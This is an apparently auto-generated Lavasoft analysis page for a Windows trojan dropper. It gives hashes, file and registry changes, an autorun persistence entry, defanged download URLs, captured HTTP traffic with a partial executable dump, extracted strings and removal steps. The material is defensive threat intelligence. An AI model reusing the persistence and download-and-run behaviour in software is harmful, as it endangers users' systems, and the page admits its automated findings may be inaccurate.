Gen.Variant.Zusy.224016_0e79a1d33e

by malwarelabrobot on March 16th, 2017 in Malware Descriptions.

Trojan.Win32.Agent.nezazd (Kaspersky), Gen:Variant.Zusy.224016 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0e79a1d33eb1d2beb44de83b00383f78
SHA1: 9a90b617307c1b4ec117d5d3a862bf227958d9e3
SHA256: aa0e234b7b43495cd2272d403f78bc60194c3219e1ecf861d1f28cf036a62624
SSDeep: 12288:7XwOrReFWQFe6hErRivAk/IpImWpzTXyVhRElM5VsA:7XwOrRsiMErRivAJSWVhWcVh
Size: 463415 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (0 bytes)

The process Bind.exe:3680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)

The process %original file name%.exe:3844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)

The process setup.tmp:3412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (0 bytes)

Registry activity

The process uc.exe:3972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"

The process Bind.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process setup.tmp:3412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "68 EB 27 85 4B 4C 47 E0 DF 55 83 6F 1B A4 1C D0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "A0 8F 16 97 54 36 AE EC A6 2F 93 7D AC 26 C8 7E"
"Owner" = "54 0D 00 00 BA 9D 21 E7 75 9D D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

Dropped PE files

MD5 File path
ec58caa0cb658e8958ece2811583c6c0 c:\Program Files\fff\Bind.exe
82e42e2a674a2d98e8688ef29696fdb4 c:\Program Files\fff\uc.exe
f13f028e99888a77e21c721961101339 c:\Program Files\fff\unins000.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 101854 101888 4.62608 0c04e49d78a3c453186c916e6f29540d
.rdata 106496 15306 15360 3.96022 1eff757b36a6b7a599236ac8b1b35b4d
.data 122880 19948 2560 3.08518 21d5c7a8ba54658b1e07909bf1045c79
.rsrc 143360 6124 6144 2.63104 6cfc1356822af5f0acc53b008cf23f9b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
5a212666f160fc40508f1bb3da9a0e4e

URLs

URL IP
hxxp://www.guoneizhu.com/ucni.txt
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe
teredo.ipv6.microsoft.com 157.56.120.207
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT
Accept-Ranges: bytes
ETag: "d5a67fc2eb9bd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:03 GMT
Content-Length: 334
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518
).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.g
uoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe
..hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2e
d9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe..HTTP/1.1 200 OK.
.Content-Type: text/plain..Last-Modified: Mon, 13 Mar 2017 11:20:02 GM
T..Accept-Ranges: bytes..ETag: "d5a67fc2eb9bd21:0"..Server: Microsoft-
IIS/10.0..Date: Wed, 15 Mar 2017 10:21:03 GMT..Content-Length: 334..ht
tp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).
exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.guo
neizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe..
hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9
c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe......


GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1


Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:04 GMT
Content-Length: 51179792
MZ......................@...................................H.........
..!..L.!This program cannot be run in DOS mode....$.......]....o...o..
.o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....
X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..
o...o;..o...4...o..Rich.o..........................PE..L...Y..X.......
.............................. ....@..........................P.......
...................................Y.......T......................../.
......n..@...T...............................@........................
....................text...I........................... ..`.data...<
;e... ......................@....idata...,...........&..............@.
.@.gfids..(............T..............@..@.tls.................X......
........@....rsrc................Z..............@..@.reloc...n.......p
...R..............@..B................................................
......................................................................
....................................................A.......J...A...A.
..A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.
A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.
................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.
7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.
5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.
5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.
D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

uc.exe_3972:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\*.*
%s\%s
@.reloc
GetProcessWindowStation
"%/28;=#$019:>?
mgM
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1 1@1`1|1
8 8$80848
%Program Files%\fff\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
%s\Internet Explorer\iexplore.exe
http\shell\open\command
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
uc.exe
1, 0, 0, 1

Bind.exe_3680:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
HttpQueryInfoA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\fff\Bind.exe
Bind.exe
1, 0, 0, 1
msctls_hotkey32
HotKey1


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setup.exe:4040
    uc.exe:3972
    Bind.exe:3680
    %original file name%.exe:3844
    setup.tmp:3412

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
    %Program Files%\fff\unins000.dat (1376 bytes)
    %Program Files%\fff\fff.ini (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
    %Program Files%\fff\Bind.exe (73 bytes)
    %Program Files%\fff\is-HK0TD.tmp (23961 bytes)
    %Program Files%\fff\is-HIE46.tmp (673 bytes)
    %Program Files%\fff\uc.exe (192 bytes)
    %Program Files%\fff\is-6T2JC.tmp (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost0" = "%Program Files%\fff\uc.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now